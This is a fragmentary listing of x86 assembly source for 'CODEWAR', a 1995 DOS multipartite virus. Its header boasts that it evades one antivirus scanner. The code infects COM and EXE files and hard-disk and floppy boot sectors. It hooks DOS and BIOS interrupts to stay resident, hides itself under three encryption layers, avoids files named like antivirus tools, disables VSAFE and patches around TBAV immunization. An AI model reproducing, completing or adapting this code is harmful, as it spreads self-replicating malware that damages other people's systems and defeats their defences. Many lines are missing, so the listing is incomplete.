1 ;-------------------------------------------------------------------------
\r
13 ; C O D E W A R V i r u s
\r
16 ; Programming by Sirius & Mindmaniac
\r
68 ;---------------------------------------------------------------------------
\r
75 ; This programme introduces into the technique of multipartite viruses.
\r
76 ; Pass to responsible people only!
\r
85 ; - Infection Type: - COM files,
\r
87 ; - Master Boot Record (MBR) on Hard Disk Drives
\r
88 ; - Boot Sector (BS) on Floppy Disk Drives
\r
89 ; ( 1.44 Mb + 1.2 Mb )
\r
92 ; - Encryption: 3-layer-enryption (generic)
\r
94 ; - Memory resident (Bootsector virus technique)
\r
98 ; - Similarities: Alive (File Virus), Junkie (Multipartite Virus)
\r
104 ; Additional Notes:
\r
105 ; -------------------
\r
107 ; Infected objects are not detected by SSC Anti-Virus Scanner and
\r
127 ;----------------------------------------------------------------------------
\r
137 DS_File_Name db 8 dup(0)
\r
138 DS_File_Ext db 3 dup(0)
\r
140 DS_Reserved db 10 dup(0)
\r
143 DS_Start_Clust dw ?
\r
149 FCB_File_Name db 8 dup(0)
\r
150 FCB_File_Ext db 3 dup(0)
\r
156 FCB_Reserved db 8 dup(0)
\r
162 DTA_Reserved db 21 dup(0)
\r
164 DTA_File_Time1 db ? ; = seconds
\r
165 DTA_File_Time2 db ?
\r
168 DTA_File_Name db 13 dup(0)
\r
172 SFT_Reserved1 dw ? ; 0
\r
173 SFT_Open_Mode dw ? ; 2
\r
174 SFT_File_Attr db ? ; 4
\r
175 SFT_Reserved2 dw ? ; 5
\r
176 SFT_Reserved3 dd ? ; 7
\r
177 SFT_Reserved4 dw ? ; 11
\r
178 SFT_File_Time dw ? ; 13
\r
179 SFT_File_Date dw ? ; 15
\r
180 SFT_File_SizeLo dw ? ; 17
\r
181 SFT_File_SizeHi dw ? ; 19
\r
182 SFT_Curr_OfsLo dw ? ; 21
\r
183 SFT_Curr_OfsHi dw ? ; 23
\r
184 SFT_Reserved7 dw ? ; 25
\r
185 SFT_Reserved8 dd ? ; 27
\r
186 SFT_Reserved9 db ? ; 31
\r
187 SFT_File_Name db 8 dup(?) ; 32 = 20h
\r
188 SFT_File_Ext db 3 dup(?) ; 40 = 28h
\r
192 Buf_0h dw 0 ; "MZ" oder "ZM" (selten)
\r
193 Buf_2h dw 0 ; Last page size
\r
194 Buf_4h dw 0 ; Size in pages
\r
201 Buf_12h dw 0 ; CheckSum
\r
204 Buf_18h dw 0 ; WINDOWS Marker
\r
209 Flag_Exec_Infection equ 1
\r
214 Reloc = ofs Vir_Start
\r
216 Enc_Word_Length = (Virus_Length/2)+1
\r
217 Virus_Length = 4*512
\r
218 Header_Length = 18h
\r
220 File_Type_COM = byte (Restore_COM-File_Type)-2
\r
221 File_Type_EXE = byte (Restore_EXE-File_Type)-2
\r
223 Media_Descriptor_144 = 0F0h
\r
224 Media_Descriptor_120 = 0F9h
\r
226 Vir_Len_Sectors = 4
\r
228 Vir_Harddisk_Track = 0
\r
229 Vir_Harddisk_Head = 0
\r
230 Vir_Harddisk_Sector = 4
\r
232 Vir_Floppy_120_Track = 79
\r
233 Vir_Floppy_120_Head = 1
\r
234 Vir_Floppy_120_Sector = 6
\r
236 Vir_Floppy_144_Track = 79
\r
237 Vir_Floppy_144_Head = 1
\r
238 Vir_Floppy_144_Sector = 15
\r
241 Names_HDD_Track = 0
\r
243 Names_HDD_Sector = 3
\r
248 F_Min_LengthCOM = 3000
\r
249 F_Max_LengthCOM = 50000
\r
253 F_Min_LengthEXE = 6 ; = 3 kb
\r
254 F_Max_LengthEXE = 2000 ; = 1000 kb
\r
258 TOM_Decrement_value = 5
\r
262 CODE SEGMENT BYTE PUBLIC 'CODE'
\r
263 ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
\r
270 ;----------------------------------------------------------------------------
\r
271 ; allways start at seg:0000
\r
274 ;----------------------------------------------------------------------------
\r
278 ;----------------------------------------------------------------------------
\r
279 ; 1st encryption layer (outer)
\r
280 ;----------------------------------------------------------------------------
\r
282 mov CX,Enc_Word_Length
\r
286 E1_Idx_Val dw ofs E1_Encrypted_Code
\r
294 XOR Word Ptr cs:[bp],ax
\r
304 jmp short E1_Dec_Loop
\r
307 ;----------------------------------------------------------------------------
\r
313 ;----------------------------------------------------------------------------
\r
314 ; 2nd encryption layer (inner)
\r
315 ;----------------------------------------------------------------------------
\r
316 mov cx,(Enc_Word_Length/2) +1
\r
320 E2_Idx_Val dw ofs E2_Encrypted_Code
\r
339 loop short E2_Dec_Loop
\r
341 ;----------------------------------------------------------------------------
\r
347 ;----------------------------------------------------------------------------
\r
348 ; 3rd encryption layer (innerst)
\r
349 ;----------------------------------------------------------------------------
\r
350 mov cx,(Enc_Word_Length/3)+1
\r
354 E3_Idx_Val dw ofs E3_Encrypted_Code
\r
383 E3_Key_Change_1 dw 0
\r
387 E3_Key_Change_2 dw 0
\r
389 loop short E3_Dec_Loop
\r
390 ;----------------------------------------------------------------------------
\r
396 ;----------------------------------------------------------------------------
\r
402 ;----------------------------------------------------------------------------
\r
406 ;----------------------------------------------------------------------------
\r
407 ; Restore program-header, the registers and go back to the program
\r
413 db 0EBh ; JMP-short-opcode
\r
414 File_Type db File_Type_COM
\r
415 ;----------------------------------------------------------------------------
\r
418 ;----------------------------------------------------------------------------
\r
419 ; restore the COM-host-file
\r
425 MOV Word Ptr cs:[DI],1234h
\r
429 MOV byte Ptr cs:[DI+2],12h
\r
440 ;----------------------------------------------------------------------------
\r
443 ;----------------------------------------------------------------------------
\r
444 ; restore the EXE-host-file
\r
447 mov ax,ds ; DS = PSP !
\r
448 add ax,10h ; + 100h bytes of PSP
\r
449 add cs:[bx+ofs Old_CS -Reloc],ax ; = new CS
\r
450 add ax,0000 ; + old SS
\r
455 mov sp,0000 ; set SP
\r
460 call ZeroRegsForHost
\r
462 db 0EAh ; = JMP Old_CS:Old_IP
\r
464 ; In an EXE - header-values are stored here
\r
469 ;----------------------------------------------------------------------------
\r
472 db " PSYCHo-TECH GMBH 1995 "
\r
474 ;----------------------------------------------------------------------------
\r
483 dw ofs Delta -Reloc
\r
493 ; prepare the retf to Exit_File
\r
496 lea ax,cs:[bx+ofs Exit_File -Reloc]
\r
499 ; change CS, so we start at ofs 0 not 100h
\r
505 MOV AX,ofs Continue -Reloc
\r
508 ;----------------------------------------------------------------------------
\r
512 ;----------------------------------------------------------------------------
\r
521 mov word ptr ds:[(79*2)],00cf9h ;= lightred point "ù"
\r
525 ;----------------------------------------------------------------------------
\r
529 ;----------------------------------------------------------------------------
\r
539 ; decrement RAM by xx kB
\r
541 SUB Word Ptr DS:[0413h],TOM_Decrement_value
\r
547 ; move virus to TOM (xxxx bytes)
\r
549 MOV CX,Virus_Length
\r
553 ; set new INT 13h and 1Ch
\r
558 MOV DI,ofs Old_Int_13 -Reloc
\r
559 MOV AX,ofs New_Int_13 -Reloc
\r
562 MOV Byte Ptr ES:[ofs Got_Int_21 -Reloc],0
\r
565 MOV DI,ofs Old_Int_1c -Reloc
\r
566 MOV AX,ofs New_Int_1c -Reloc
\r
573 MOV DI,ofs Old_Int_21 -Reloc
\r
580 ; prepare RETF to orig PAR/BS
\r
586 push ofs Boot_Finish -Reloc
\r
591 ; restore the JUMP-Word and the patched PAR/BS
\r
593 MOV SI,7c00h + 512 + BS_First_word -Reloc
\r
596 mov di,7c00h + 60h ; offset of the patch-area
\r
599 ; Patch the TBAV immunized partition
\r
601 cmp w cs:[7c00h+0dfh],"hT"
\r
602 jne no_TB_partition
\r
603 mov b cs:[7c00h+73h],0
\r
607 ; goto Boot_Finish / infect C:
\r
610 ;----------------------------------------------------------------------------
\r
613 ;----------------------------------------------------------------------------
\r
616 cmp ax,0201h ; reading ?
\r
617 JNZ Jump_Old_Int_13
\r
619 CMP CX,0001h ; sector 1 and Track 0 ?
\r
620 JNZ Jump_Old_Int_13
\r
622 or dh,dh ; head 0 ?
\r
623 jnz Jump_Old_Int_13
\r
636 jmp dword ptr cs:(ofs Old_Int_13 -Reloc)
\r
638 ;----------------------------------------------------------------------------
\r
642 ;----------------------------------------------------------------------------
\r
645 call dword ptr cs:(ofs Old_Int_13 -Reloc)
\r
647 ;----------------------------------------------------------------------------
\r
650 db " >>> BRAVEd DANGER 4 BRAVE PEOPLe <<< "
\r
653 ;----------------------------------------------------------------------------
\r
666 MOV DI,ofs Old_Int_13 -Reloc
\r
671 JMP Short Read_Drive_C
\r
672 ;----------------------------------------------------------------------------
\r
675 ;----------------------------------------------------------------------------
\r
679 ;----------------------------------------------------------------------------
\r
682 ;----------------------------------------------------------------------------
\r
687 CALL Int13_Works ; infect drive C
\r
695 ;----------------------------------------------------------------------------
\r
698 ;----------------------------------------------------------------------------
\r
706 CALL Read_or_Write_BS_from_A
\r
712 MOV DI,ofs Buffer + 60h -Reloc
\r
714 ; check if BS is infected
\r
716 CMP Word Ptr [SI],05EEBh ; SI=@buffer
\r
717 JNZ BS_not_infected
\r
719 CMP Word Ptr [DI],0FF33h ; == xor di,di
\r
724 ; test if it is Harddisk or floppy
\r
730 ; test if HD 1.44 (=F0) or HD 1.2 (=F9) floppy
\r
732 CMP Byte Ptr DS:[ofs Buffer+15h -Reloc],Media_Descriptor_144
\r
735 CMP Byte Ptr DS:[ofs Buffer+15h -Reloc],Media_Descriptor_120
\r
739 MOV CL,Vir_Floppy_120_Sector
\r
740 JMP Short Floppy_Disk
\r
741 ;----------------------------------------------------------------------------
\r
744 ;----------------------------------------------------------------------------
\r
745 ; 1.44 floppy found
\r
751 ; 0:490h == AT Drive 0 status
\r
753 CMP Byte Ptr DS:[0090h],97h
\r
758 MOV CL,Vir_Floppy_144_Sector
\r
764 MOV CH,Vir_Floppy_120_Track
\r
766 ;----------------------------------------------------------------------------
\r
769 ;----------------------------------------------------------------------------
\r
771 MOV CX,Vir_Harddisk_Sector
\r
773 ;----------------------------------------------------------------------------
\r
776 ;----------------------------------------------------------------------------
\r
778 MOV DH,Vir_Floppy_120_Head
\r
780 MOV DS:[ofs Ptc_CX -Reloc],CX ; patch the PAR
\r
781 MOV DS:[ofs Ptc_DX -Reloc],DX
\r
788 ; Move the JMP-Op to the beginning of BS/PAR
\r
790 MOV DI,ofs BS_first_word -Reloc ; SI=ofs buffer
\r
807 CALL Read_or_Write_BS_from_A
\r
813 MOV AL,Vir_Len_Sectors
\r
814 MOV BX,ofs Buffer -Reloc
\r
818 MOV Word Ptr DS:[ofs E1_Idx_Val -Reloc],7c00h +512+E1_Encrypted_Code -Reloc -Camouf
\r
819 MOV Word Ptr DS:[ofs E2_Idx_Val -Reloc],7c00h +512+E2_Encrypted_Code -Reloc
\r
820 MOV Word Ptr DS:[ofs E3_Idx_Val -Reloc],7c00h +512+E3_Encrypted_Code -Reloc
\r
825 CALL Call_Old_Int_13
\r
828 ;----------------------------------------------------------------------------
\r
831 ;----------------------------------------------------------------------------
\r
832 ; read the PAR/BS from drive
\r
833 ;----------------------------------------------------------------------------
\r
835 Read_or_Write_BS_from_A:
\r
839 MOV BX,ofs Buffer -Reloc
\r
843 CALL Call_Old_Int_13
\r
847 ;----------------------------------------------------------------------------
\r
850 ;----------------------------------------------------------------------------
\r
856 ;----------------------------------------------------------------------------
\r
859 ;----------------------------------------------------------------------------
\r
869 ;----------------------------------------------------------------------------
\r
873 ;----------------------------------------------------------------------------
\r
895 ;----------------------------------------------------------------------------
\r
899 ;============================================================================
\r
905 ; get (random) key-values
\r
909 MOV word ptr cs:[ofs E1_Key_Val -Reloc],ax
\r
913 MOV word ptr cs:[ofs E2_Key_Val_1 -Reloc],ax
\r
916 MOV word ptr cs:[ofs E2_Key_Val_2 -Reloc],ax
\r
920 MOV word ptr cs:[ofs E3_Key_Val_1 -Reloc],ax
\r
923 MOV word ptr cs:[ofs E3_Key_Val_2 -Reloc],ax
\r
926 MOV word ptr cs:[ofs E3_Key_Val_3 -Reloc],ax
\r
929 MOV word ptr cs:[ofs E3_Key_Change_1 -Reloc],ax
\r
932 MOV word ptr cs:[ofs E3_Key_Change_2 -Reloc],ax
\r
944 MOV DI,ofs Buffer -Reloc
\r
945 MOV CX,(ofs Encrypted_Code_End - ofs Vir_Start)
\r
961 ;----------------------------------------------------------------------------
\r
962 ; encrypt innerst layer E3
\r
964 MOV w ax,cs:[ofs E3_Key_Val_1 -Reloc]
\r
965 MOV w bx,cs:[ofs E3_Key_Val_2 -Reloc]
\r
966 MOV w dx,cs:[ofs E3_Key_Val_3 -Reloc]
\r
969 MOV w di,cs:[ofs E3_Key_Change_1 -Reloc]
\r
970 MOV w bp,cs:[ofs E3_Key_Change_2 -Reloc]
\r
972 MOV si,ofs Buffer -Reloc
\r
973 ADD si,ofs E3_Encrypted_Code -Reloc
\r
975 MOV CX,(Enc_Word_Length/3) +1
\r
995 ;----------------------------------------------------------------------------
\r
999 ;----------------------------------------------------------------------------
\r
1000 ; encrypt inner layer E2
\r
1002 MOV w ax,cs:[ofs E2_Key_Val_1 -Reloc]
\r
1003 MOV w bx,cs:[ofs E2_Key_Val_2 -Reloc]
\r
1005 MOV si,ofs Buffer -Reloc
\r
1006 ADD si,ofs E2_Encrypted_Code -Reloc
\r
1008 MOV CX,(Enc_Word_Length/2) +1
\r
1020 ;----------------------------------------------------------------------------
\r
1024 ;----------------------------------------------------------------------------
\r
1025 ; encrypt outer layer E1
\r
1027 MOV word ptr bx,cs:[ofs E1_Key_Val -Reloc]
\r
1029 MOV DI,ofs Buffer -Reloc
\r
1030 ADD DI,ofs E1_Encrypted_Code -Reloc
\r
1032 MOV CX,Enc_Word_Length
\r
1039 ;----------------------------------------------------------------------------
\r
1047 ;============================================================================
\r
1051 ;----------------------------------------------------------------------------
\r
1053 CMP Byte Ptr CS:[ofs Got_Int_21 -Reloc],1
\r
1063 ; load int 20h seg and compare if below 800h
\r
1065 MOV AX,DS:[4*20h +2]
\r
1073 ; cmp with int 21h seg
\r
1078 ; cmp with int 27h seg
\r
1080 CMP DS:[4*27h +2],AX
\r
1083 ; cmp with int 2Fh seg
\r
1085 CMP DS:[4*2Fh +2],AX
\r
1088 ; ok, now hook int 21h
\r
1091 MOV DI,ofs Old_Int_21 -Reloc
\r
1094 MOV AX,ofs New_Int_21 -Reloc
\r
1097 ; set the flag for it
\r
1098 MOV Byte Ptr CS:[ofs Got_Int_21 -Reloc],01h
\r
1101 ; get int 2f vector
\r
1105 mov w ax,ds:[4*2fh]
\r
1106 mov w cs:[ofs Old_Int_2f -Reloc],ax
\r
1107 mov w ax,ds:[4*2fh+2]
\r
1108 mov w cs:[ofs Old_Int_2f -Reloc+2],ax
\r
1118 jmp dword ptr cs:(ofs Old_int_1c -Reloc)
\r
1119 ;----------------------------------------------------------------------------
\r
1123 ;----------------------------------------------------------------------------
\r
1127 IF Flag_Exec_Infection
\r
1129 JZ Control_Operation
\r
1134 JZ Control_Operation
\r
1137 jmp dword ptr cs:(ofs Old_Int_21 -Reloc)
\r
1138 ;----------------------------------------------------------------------------
\r
1141 ;----------------------------------------------------------------------------
\r
1142 Control_Operation:
\r
1151 call Deinstall_Vsafe
\r
1158 MOV Word Ptr DS:[4*24h], ofs New_Int_24 -Reloc
\r
1159 MOV DS:[4*24h +2],CS
\r
1168 call Call_Old_Int21
\r
1180 call Call_Old_Int2F ; INT 2Fh
\r
1184 call Call_Old_Int2F ; INT 2Fh
\r
1189 ; skip AV-programs ?
\r
1191 call Check_If_AV_Name
\r
1192 jz goto_close_exit
\r
1195 ; test if executable-file
\r
1197 CMP Word Ptr ES:[DI+28h],"OC"
\r
1200 CMP Word Ptr ES:[DI+28h],"XE"
\r
1204 JMP Short Close_Exit
\r
1205 ;----------------------------------------------------------------------------
\r
1209 ;----------------------------------------------------------------------------
\r
1213 ; Check if infected
\r
1214 mov ax,es:[di.SFT_File_Time]
\r
1222 ; Datum/Zeit sichern
\r
1223 mov ax,es:[di.SFT_File_Time]
\r
1224 mov cs:[ofs Old_Time -Reloc],ax
\r
1225 mov ax,es:[di.SFT_File_Date]
\r
1226 mov cs:[ofs Old_Date -Reloc],ax
\r
1228 ; Get file length directly from the SFT and save it
\r
1229 mov ax,es:[di+SFT_File_SizeLo]
\r
1230 mov cs:[ofs File_SizeLo -Reloc], ax
\r
1231 mov ax,es:[di.SFT_File_SizeHi]
\r
1232 mov cs:[ofs File_SizeHi -Reloc], ax
\r
1234 ; Force read/write mode
\r
1235 mov word ptr es:[di.SFT_Open_Mode],2
\r
1257 MOV DS:[4*24h +2],ES
\r
1264 ;----------------------------------------------------------------------------
\r
1268 ;----------------------------------------------------------------------------
\r
1271 ;----------------------------------------------------------------------------
\r
1275 ;----------------------------------------------------------------------------
\r
1277 mov byte ptr cs:[ofs File_Type -Reloc],File_Type_EXE
\r
1280 mov word ptr cs:[ofs Handle -Reloc],bx
\r
1282 ; Dont infect to big/small EXE-files!
\r
1283 mov word ptr AX,cs:[ofs File_Buffer.BUF_4h -Reloc] ; EXE size in 512 byte pages
\r
1284 cmp AX,F_Min_LengthEXE ; Don't infect files less than xxxx pages
\r
1285 JB goto_Infect_Ret
\r
1286 cmp AX,F_Max_LengthEXE ; Or bigger than xxxx pages
\r
1287 JA goto_Infect_Ret
\r
1297 ; It's OK! Process it now !
\r
1298 les ax,dword ptr cs:[File_Buffer.Buf_14h -Reloc] ;Entry_Point_Disp
\r
1299 mov cs:[ofs Old_IP -Reloc],ax
\r
1300 mov cs:[ofs Old_CS -Reloc],es
\r
1302 les ax,dword ptr cs:[File_Buffer.Buf_eh -Reloc] ;Stack_Disp
\r
1303 mov cs:[ofs Old_SS -Reloc],ax
\r
1304 mov cs:[ofs Old_SP -Reloc],es
\r
1306 mov ax,cs:[ofs File_Buffer.Buf_8h -Reloc] ; = Header size in paras
\r
1308 shl ax,cl ; Convert to byte-format
\r
1310 ; Get file size from SFT
\r
1311 push ax ; Save header size
\r
1312 mov ax,cs:[ofs File_SizeLo -Reloc]
\r
1313 mov dx,cs:[ofs File_SizeHi -Reloc]
\r
1315 ; add the padding-number
\r
1316 mov cx,cs:[ofs File_SizeLo -Reloc]
\r
1323 ; save the padding-number
\r
1324 mov cs:[ofs Padded -reloc],cx
\r
1326 pop bx ; = Header size
\r
1328 sub ax,bx ; DX:AX := file size - header size
\r
1331 mov cx,16 ; Convert to seg:ofs format
\r
1333 div cx ; DX:AX := (DX:AX) / 10h
\r
1339 mov cs:[ofs File_Buffer.Buf_14h -Reloc],dx ; New IP
\r
1340 mov cs:[ofs File_Buffer.Buf_16h -Reloc],ax ; New CS
\r
1342 inc word ptr cs:[ofs File_Buffer.Buf_16h -Reloc] ; CS
\r
1346 mov cs:[ofs File_Buffer.Buf_14h -Reloc],dx ; New IP
\r
1347 mov cs:[ofs File_Buffer.Buf_16h -Reloc],ax ; New CS
\r
1350 inc ax ; Avoid the "K" TB-flag (seems unecessary)
\r
1351 mov word ptr cs:[ofs File_Buffer.Buf_eh -Reloc],ax ; New SS
\r
1352 mov word ptr cs:[ofs File_Buffer.Buf_10h -Reloc],0 ; New SP
\r
1354 mov ax,cs:[ofs File_SizeLo -Reloc]
\r
1355 mov dx,cs:[ofs File_SizeHi -Reloc]
\r
1357 ; add the padding-number
\r
1358 add ax,cs:[ofs Padded -reloc]
\r
1362 add ax,Virus_Length ; Lo-word
\r
1363 adc dx,0 ; Hi-word
\r
1372 and ah,1 ; Mod 512
\r
1373 mov cs:[ofs File_Buffer.Buf_4h -Reloc],dx ; Size in pages (rounded up)
\r
1374 mov cs:[ofs File_Buffer.Buf_2h -Reloc],ax ; Size of last page (in bytes)
\r
1380 mov word ptr bx,cs:[ofs Handle -Reloc]
\r
1381 mov ax,cs:[ofs File_SizeLo -Reloc]
\r
1385 ; Construct index for decryptor
\r
1389 MOV word ptr DS:[ofs E1_Idx_Val -Reloc],(ofs E1_Encrypted_Code-ofs Vir_start)-Camouf
\r
1390 MOV word ptr DS:[ofs E2_Idx_Val -Reloc],(ofs E2_Encrypted_Code-ofs Vir_start)
\r
1391 MOV word ptr DS:[ofs E3_Idx_Val -Reloc],(ofs E3_Encrypted_Code-ofs Vir_start)
\r
1397 ;----------------------------------------------------------------------------
\r
1401 ;----------------------------------------------------------------------------
\r
1409 MOV CX,Header_Length
\r
1410 MOV DX,ofs File_buffer -Reloc
\r
1416 cmp word ptr cs:[ofs File_buffer -Reloc],"ZM"
\r
1420 ;----------------------------------------------------------------------------
\r
1423 mov byte ptr cs:[ofs File_Type -Reloc],File_Type_COM
\r
1432 MOV ax,word ptr DS:[File_buffer -Reloc]
\r
1433 MOV DS:[ofs Rest1 -Reloc],ax
\r
1434 MOV al,byte ptr DS:[File_buffer -Reloc +2]
\r
1435 MOV DS:[ofs Rest2 -Reloc],al
\r
1439 ; file smaller than xxxx bytes ?
\r
1441 CMP AX,F_Min_LengthCOM
\r
1444 ; file larger than xxxx bytes ?
\r
1446 CMP AX,F_Max_LengthCOM
\r
1453 ; Construct index for decryptor
\r
1458 ADD AX,100h+ (ofs E1_Encrypted_Code-ofs Vir_Start)-Camouf
\r
1459 MOV DS:[ofs E1_Idx_Val -Reloc],AX
\r
1465 ADD AX,100h+ (ofs E2_Encrypted_Code-ofs Vir_Start)
\r
1466 MOV DS:[ofs E2_Idx_Val -Reloc],AX
\r
1472 ADD AX,100h+ (ofs E3_Encrypted_Code-ofs Vir_Start)
\r
1473 MOV DS:[ofs E3_Idx_Val -Reloc],AX
\r
1478 ; construct and insert a JUMP-INSTR.
\r
1480 MOV byte ptr DS:[File_buffer -Reloc],0E9h
\r
1482 MOV word ptr DS:[File_buffer+1 -Reloc],AX
\r
1483 ;----------------------------------------------------------------------------
\r
1487 ;----------------------------------------------------------------------------
\r
1490 ; write body at EOF
\r
1493 MOV CX,Virus_Length
\r
1494 MOV DX,ofs Buffer -Reloc
\r
1495 CALL Encrypt_Virus
\r
1499 ; write JUMP to TOF
\r
1505 MOV CX,Header_Length
\r
1506 MOV DX,ofs File_buffer -Reloc
\r
1509 ; restore time stamps
\r
1512 mov cx,cs:[ofs Old_Time -Reloc]
\r
1513 mov dx,cs:[ofs Old_Date -Reloc]
\r
1515 or cl,Time_Stamp ; Mark with Time-ID
\r
1520 ;----------------------------------------------------------------------------
\r
1524 ;----------------------------------------------------------------------------
\r
1536 ;----------------------------------------------------------------------------
\r
1540 ;----------------------------------------------------------------------------
\r
1552 ;----------------------------------------------------------------------------
\r
1556 ;----------------------------------------------------------------------------
\r
1557 Check_If_AV_Name proc near
\r
1558 cmp byte ptr es:[di.SFT_File_Name],"L"
\r
1560 cmp byte ptr es:[di.SFT_File_Name],"-"
\r
1562 cmp word ptr es:[di.SFT_File_Name],"BT"
\r
1564 cmp word ptr es:[di.SFT_File_Name],"CS"
\r
1566 cmp word ptr es:[di.SFT_File_Name],"-F"
\r
1568 cmp word ptr es:[di.SFT_File_Name],"IV"
\r
1572 Check_If_AV_Name endp
\r
1573 ;----------------------------------------------------------------------------
\r
1578 ;----------------------------------------------------------------------------
\r
1588 ;----------------------------------------------------------------------------
\r
1591 ;----------------------------------------------------------------------------
\r
1592 Call_Old_Int21 PROC NEAR
\r
1594 call dword ptr cs:(ofs Old_Int_21 -Reloc)
\r
1596 Call_Old_Int21 ENDP
\r
1597 ;----------------------------------------------------------------------------
\r
1600 ;----------------------------------------------------------------------------
\r
1601 Call_Old_Int2F PROC NEAR
\r
1603 call dword ptr cs:(ofs Old_Int_2F -Reloc)
\r
1605 Call_Old_Int2F ENDP
\r
1606 ;----------------------------------------------------------------------------
\r
1610 ;----------------------------------------------------------------------------
\r
1614 ;----------------------------------------------------------------------------
\r
1617 ;----------------------------------------------------------------------------
\r
1629 ; If Int 21h allready captured then 1 else 0
\r
1636 ;----------------------------------------------------------------------------
\r
1641 ;----------------------------------------------------------------------------
\r
1642 BS_first_word dw 0
\r
1643 Old_BS_code db 32 dup ('B')
\r
1644 ;----------------------------------------------------------------------------
\r
1647 ;----------------------------------------------------------------------------
\r
1648 ; The first word of the PAR/BS is stored here
\r
1652 ;----------------------------------------------------------------------------
\r
1655 ;----------------------------------------------------------------------------
\r
1665 ; read xx sectors to 7e00h
\r
1668 MOV AX,0204h ; !!!!!! Sectors !!!!!!
\r
1684 ; Jump to the reload code from 2 sectors
\r
1685 ; The offset in the BS/PAR where this instuction is executed is at
\r
1686 ; BS/PAR:60h+($-Start_Jboot)
\r
1688 jmp $ + 512 - ($-Start_Jboot+60h) ;+512 -125
\r
1689 ;----------------------------------------------------------------------------
\r
1694 ;----------------------------------------------------------------------------
\r
1695 db " [[ Cú0úDúEúWúAúR ]] <32> Germany 1995 "
\r
1696 db "Virtually called to life & survival by"
\r
1698 db "RGOEPMSQO & NJOENBOJBD"
\r
1700 db " ==>= AllE GUtEN DiNGE SiND DREi ==>= "
\r
1703 ;----------------------------------------------------------------------------
\r
1706 Encrypted_Code_End equ $
\r
1709 ;----------------------------------------------------------------------------
\r
1711 db Header_Length dup ('H')
\r
1712 ;----------------------------------------------------------------------------
\r
1715 ;----------------------------------------------------------------------------
\r
1716 ; here is the virus copied and encrypted
\r
1718 ;----------------------------------------------------------------------------
\r